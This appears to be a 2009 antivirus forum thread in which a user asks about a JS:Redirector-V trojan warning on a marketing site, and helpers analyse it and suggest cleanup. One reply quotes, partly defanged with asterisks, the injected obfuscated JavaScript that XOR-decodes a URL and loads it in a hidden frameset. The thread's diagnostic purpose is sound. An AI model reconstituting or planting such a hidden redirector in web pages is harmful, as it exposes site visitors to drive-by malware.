JS:Redirector-V [Trj]

I was referred to a site named WWW.autopilotprofits.com by a service I subscribe to, which I would normally trust. However, when I try to access the service, AVAST issues me a warning that the file I’m trying to access is infected with JS:Redirector-V [Trj] and I chose to abort the connection. I contacted the service that referred me to this site and they assured me that they regularly use the site without problem. Before I tell AVAST to accept this site as a false positive, I’d like to have some assurance my computer will not become infected. I have googled for JS:Redirector-V [Trj], but could not find a direct match. There are other, e.g., JS:Redirector-B [Trj], JS:Redirector-G [Trj], etc., but I don’t know if they are related. Most of all, I need to know what this trojan horse does. Does anyone know anything about it?

Well using firefox 3.0.11 I don’t get an avast alert on that page (no alert on Avant browser either), so can you be more detailed on the file you are trying to access and what avast alerted on.

Check the avast! Log Viewer (right click the avast ‘a’ icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe

  • Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log

When posting URLs to suspect sites, change the http to hXXp so the link isn’t active (clickable) avoiding accidental exposure.

Hi cpfeiffer and DavidR,

Well the site has been redirecting to malcode.
Here is the google security report: Of 35 pages that have been tested during the last 90 days, 1 page without user’s consent downloaded and installed malicious software. The last time this was found was on 2009-06-27. The last time the site had suspicous content was on 2009-06-24.
Malicious software was hosted on 1 domain, e.g. mixmaxgroup.cn/, malicious software there includes 2 trojans, 1 scripting exploit.

This site was hosted on 1 network(s) including AS19181 (CWIE),

Here is a list of the files I have tried to access:
hxxp://www.autopilotprofits.com/contentrewrite.htm
hxxp://www.autopilotprofits.com/cheapdomains.htm
hxxp://www.autopilotprofits.com/sya.htm
hxxp://www.autopilotprofits.com/keyword.htm
hxxp://www.autopilotprofits.com/bg.htm
hxxp://www.autopilotprofits.com/goodhosting.htm
hxxp://www.autopilotprofits.com/wt.htm

I get the same warning from AVAST on each one. Would it be advisable to download these file and then ask AVAST or another service to clean them afterwards, or is there a way to clean them before downloading them?

Hi cpfeiffer,

On the first link I get this: (Level: 1) Url checked: (frame source)
hxtp://www.autopilotprofits.com/+yt+
Blank page / could not connect
No ad codes identified

And immediately it is BINGO- this is the (EDITED BY ME for security reasons) suspicious code in question:

 ^!--
window.status = ' ';.........
sdf = "iuuq$2@..vvv/rsurngu/bnl.bfh,cho.mxsd/bfh.kwl.q`bj`fd.fn^inldq`fd/iulm$2Gq`bj^he$2E4020$37`gg^he$2E0050";yt="";v*r length=sdf.length;for(i=0;i<length;i++){yt+=String.fromCh*rCode(sdf.ch*rCodeAt(i)^1);}yt=unesc*pe(yt);
document.writeln("<FR*MESET BORDER=\"0\" FR*MEBORDER=\"0\" FR*MESPACING=\"0\" R0WS=\"100%,0\\*\"^");
document.writeln("<frame fr*meBorder=\"0\" fr*meSpacing=\"0\" m*rginHeight=\"0\" marginWidth=\"0\" scrolling=\"yes\" n*me=\"m*ster\" noresize src=\""+yt+"\"^");
document.writeln(^\/FR*MESET^");
//--^

You may have noticed that when you take down all your webpages from your server and put up backupfiles there, this nasty trojan will have reinfected your pages within the next 6 hours.

How to sove this?
Easy peasy: change the ftp-server password . When you have done this take all infected pages from the server and then change for the backup. Upload all and away is your trojan- your visitors can again safely visit your site! Avast is one of the few av vendors to detect this trojan,

polonus

That’s all gibberish to me (pardon my ignorance). I just need to know what to do about it. I.E., are these tools usable, or do they have to be “cleaned” before downloading to my computer? And if so, how do I go about doing that?

Hi cpfeiffer,

Well you are not infected if you got the warnings from avast upon visiting the site and the connection for the malicious download was aborted. Do not download unless you want a trojan. So you are secure. Do not visit that site until it has been cleansed by the webmaster there or the site admins or the hosting firm that owns the site. You could mail them and send the webmaster the link of this thread. I think he will know what to do “from my gibberish” so the visitors of his website are again made secure by taking down the malcode from the web-page.

polonus

I haven’t the slightest idea how you found those links on the hXXp://www.autopilotprofits.com/ home page, I can find no links to any of the pages you listed. Only ones to clickbank for payment.

The coding that polonus posted uses redirection and this is what avast is alerting on I believe. However, I believe that code is related to frames so that a child page doesn’t open outside of the Parent (frame), I know more gibberish for you, so everything is wrapped within a frame.

The whois details I get for the site IP address shown in firefox doesn’t match the domain name (image1), http://whois.domaintools.com/204.14.3.168 Yet the IP address appears under Myriad Networks (image2), so it looks a little strange.

So if you try to access the pages you listed in isolation, there appears to be a frame redirect (window.status) and this is all that is on any of those pages, no page content, just a frameset redirect.